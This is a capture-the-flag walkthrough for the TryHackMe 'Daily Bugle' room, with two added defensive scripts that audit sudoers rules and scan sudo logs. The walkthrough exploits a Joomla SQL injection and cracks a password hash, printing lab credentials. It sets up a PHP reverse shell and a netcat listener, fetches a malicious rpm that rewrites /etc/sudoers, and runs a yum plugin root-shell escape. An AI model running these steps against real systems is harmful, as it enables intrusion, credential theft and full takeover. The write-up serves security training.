Daily Bugle

Room Link: https://tryhackme.com/room/dailybugle

Deploy

Access the web server, who robbed the bank?

Initial Shell

nmap -A 10.10.116.159

Python Script

git clone https://github.com/stefanlucas/Exploit-Joomla.git 
cd Exploit-Joomla/ 
python3 joomblah.py http://10.10.116.159
 [$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
  -  Extracting sessions from fb9j5_session

Cracking the hash

Save the bcrypt hash from the output above to hash.txt, then:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

We can now log in to Joomla with the credentials we have found:

Username: jonah
Password: spiderman123

Reverse Shell

All I did was follow this tutorial to get a reverse shell.

Tutorial: https://www.hackingarticles.in/joomla-reverse-shell/

Kali

nc -lvp 1234

Browser

I used this PHP reverse shell; I just needed to change the IP to my own.

PHP Reverse Shell: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Upgrade the shell to a full TTY (autocomplete)

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo;fg

Privilege Escalation

Option #1 - Create malicious rpm file

Found a password in the Joomla configuration file. The same password worked for the user jjameson, whose home directory was listed under /home.

ssh jjameson@10.10.116.159
Password: nv5uz9r3ZEDzVjNu

jjameson is able to run yum as root via sudo without a password:

sudo -l
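The root cause of both escalation options below is the sudoers rule that `sudo -l` reveals: a password-less yum entry. The following audit script is an added example (not part of the original walkthrough and not from any tool it links) that parses sudoers-style user specifications, tracks the NOPASSWD/PASSWD tags the way sudo applies them to a command list, and flags entries that hand the listed user root code execution. The sudoers text is a constructed sample; the SHELL_ESCAPE_BINARIES set is an assumption seeded only with yum, the binary this room turns on.

```python
import re
from collections import namedtuple

# Constructed sample sudoers content (not the room's real /etc/sudoers).
SAMPLE_SUDOERS = """\
## constructed /etc/sudoers sample
Defaults    requiretty
root     ALL=(ALL)   ALL
%wheel   ALL=(ALL)   ALL
jjameson ALL=(ALL)   NOPASSWD: /usr/bin/yum
deploy   ALL=(root)  NOPASSWD: /usr/bin/systemctl restart httpd, PASSWD: /usr/bin/yum
ops      ALL=(ALL)   NOPASSWD: ALL
backup   ALL=(root)  /usr/bin/rsync
"""

# Assumption: binaries that execute caller-supplied code when run as root. yum loads
# plugins from whatever -c config it is given and runs package scriptlets on localinstall.
SHELL_ESCAPE_BINARIES = {"yum"}

Finding = namedtuple("Finding", "user runas command reason")

SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")


def split_commands(cmds_part):
    """Split a command list, recording the NOPASSWD/PASSWD state that applies to each entry.
    In sudoers a tag stays in force for the following commands until another tag overrides it."""
    nopasswd = False
    out = []
    for chunk in cmds_part.split(","):
        chunk = chunk.strip()
        while True:
            m = TAG_RE.match(chunk)
            if not m:
                break
            if m.group(1) == "NOPASSWD":
                nopasswd = True
            elif m.group(1) == "PASSWD":
                nopasswd = False
            chunk = chunk[m.end():]
        if chunk:
            out.append((chunk, nopasswd))
    return out


def parse_spec(line):
    """Parse one user specification; returns (user, runas, [(command, nopasswd)]) or None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = SPEC_RE.match(line)
    if not m:
        return None
    runas = m.group("runas") or "root"  # sudo defaults to root when no (runas) is given
    return m.group("user"), runas, split_commands(m.group("cmds"))


def audit(text):
    """Return the password-less entries that give the listed user code execution as runas."""
    findings = []
    for raw in text.splitlines():
        parsed = parse_spec(raw)
        if not parsed:
            continue
        user, runas, commands = parsed
        for cmd, nopasswd in commands:
            if not nopasswd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append(Finding(user, runas, cmd, "NOPASSWD for any command"))
            elif binary in SHELL_ESCAPE_BINARIES:
                findings.append(Finding(user, runas, cmd,
                                        f"{binary} runs plugins and package scriptlets as {runas}"))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS):
        print(f"{f.user} -> ({f.runas}) {f.command}: {f.reason}")
```

Running it on the sample reports jjameson (NOPASSWD yum) and ops (NOPASSWD ALL); the deploy line is not reported because the PASSWD: tag re-enables the password prompt for yum, which is the fix a defender would apply to the jjameson rule (or, better, drop the yum entry and provide a dedicated update mechanism).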

Kali

echo 'echo "jjameson ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > hack.sh 
git clone https://github.com/jordansissel/fpm.git 
cd fpm/bin/ 
./fpm -n root -s dir -t rpm -a all --before-install /root/hack.sh . 
python2 -m SimpleHTTPServer 81

Our rpm package is now built and served over HTTP on port 81.

Victim

cd /tmp/ 
wget http://10.10.160.125:81/root-1.0-1.noarch.rpm 
sudo yum localinstall root-1.0-1.noarch.rpm 
sudo -i

Option #2 - Spawn interactive root shell by loading a custom plugin

Exploit Link: https://gtfobins.github.io/gtfobins/yum/

I just had to copy-paste from GTFOBins and it worked right away.

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
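Both escalation options leave a distinctive trace in sudo's own logging (the `COMMAND=` field of the entries sudo writes to syslog, /var/log/secure on CentOS): Option #1 is a `yum localinstall` of a package sitting in /tmp, Option #2 is yum started with a `-c` config under a mktemp directory plus `--enableplugin`. The detector below is an added example, not part of the original walkthrough, that parses those entries and raises an alert when root yum is pointed at user-writable paths or at extra plugins, and when a sudo command falls outside the yum-only rule this host is assumed to have (ALLOWED_BINARIES is that assumption). The log lines are constructed to mirror the commands on this page.

```python
import re
import shlex

# Constructed sample of syslog-style sudo entries (not captured from the room).
SAMPLE_LOG = """\
Dec 14 10:01:12 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum update
Dec 14 10:02:40 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/yum localinstall root-1.0-1.noarch.rpm
Dec 14 10:05:03 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum -c /tmp/tmp.Ab12Cd/x --enableplugin=y
Dec 14 10:06:00 dailybugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/bin/bash -i
Dec 14 10:07:15 dailybugle sshd[2211]: Accepted password for jjameson from 10.10.160.125 port 51234 ssh2
"""

SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<runas>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$"
)

# Assumption: the host's only sudo rule is the NOPASSWD yum entry that `sudo -l` showed.
ALLOWED_BINARIES = {"yum"}
# Directories an unprivileged user can write to; root yum should never read config,
# plugins or packages from them.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
# yum settings that change where plugins are loaded from or whether they load at all.
PLUGIN_OPTS = ("pluginpath", "pluginconfpath", "plugins")


def parse_sudo_event(line):
    """Return the sudo fields of one syslog line, or None for non-sudo lines."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def resolve(path, pwd):
    """Make a relative argument absolute using the PWD sudo recorded for the command."""
    return path if path.startswith("/") else pwd.rstrip("/") + "/" + path


def analyze_yum(argv, pwd):
    """Flag yum invocations that read caller-controlled config, plugins or packages."""
    alerts = []
    i = 1
    while i < len(argv):
        arg = argv[i]
        config = None
        if arg in ("-c", "--config") and i + 1 < len(argv):
            config = argv[i + 1]
            i += 1
        elif arg.startswith(("-c=", "--config=")):
            config = arg.split("=", 1)[1]
        if config is not None and resolve(config, pwd).startswith(UNTRUSTED_DIRS):
            alerts.append(f"yum config read from user-writable path: {resolve(config, pwd)}")
        elif arg.startswith("--enableplugin"):
            alerts.append(f"plugin enabled on the command line: {arg}")
        elif arg.startswith("--setopt=") and arg.split("=", 1)[1].split("=")[0] in PLUGIN_OPTS:
            alerts.append(f"plugin setting overridden: {arg}")
        elif arg.endswith(".rpm") and resolve(arg, pwd).startswith(UNTRUSTED_DIRS):
            alerts.append(f"local package installed from user-writable path: {resolve(arg, pwd)}")
        i += 1
    return alerts


def scan(log_text):
    """Return [(user, command, [alerts])] for every sudo event that needs attention."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_sudo_event(line)
        if not ev:
            continue
        argv = shlex.split(ev["cmd"])
        binary = argv[0].rsplit("/", 1)[-1]
        if binary not in ALLOWED_BINARIES:
            alerts = [f"sudo command outside the yum-only allow-list: {argv[0]}"]
        else:
            alerts = analyze_yum(argv, ev["pwd"])
        if alerts:
            findings.append((ev["user"], ev["cmd"], alerts))
    return findings


if __name__ == "__main__":
    for user, cmd, alerts in scan(SAMPLE_LOG):
        print(f"{user}: {cmd}")
        for alert in alerts:
            print("   -", alert)
```

The plain `yum update` entry produces nothing, the localinstall from /tmp and the `-c /tmp/... --enableplugin=y` entries each raise alerts, and the interactive shell that follows the rpm trick is caught by the allow-list check. The same rules translate directly into auditd or SIEM queries on the sudo COMMAND field; the durable fix remains removing the NOPASSWD yum rule, since yum honours any config and plugin directory its caller names.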
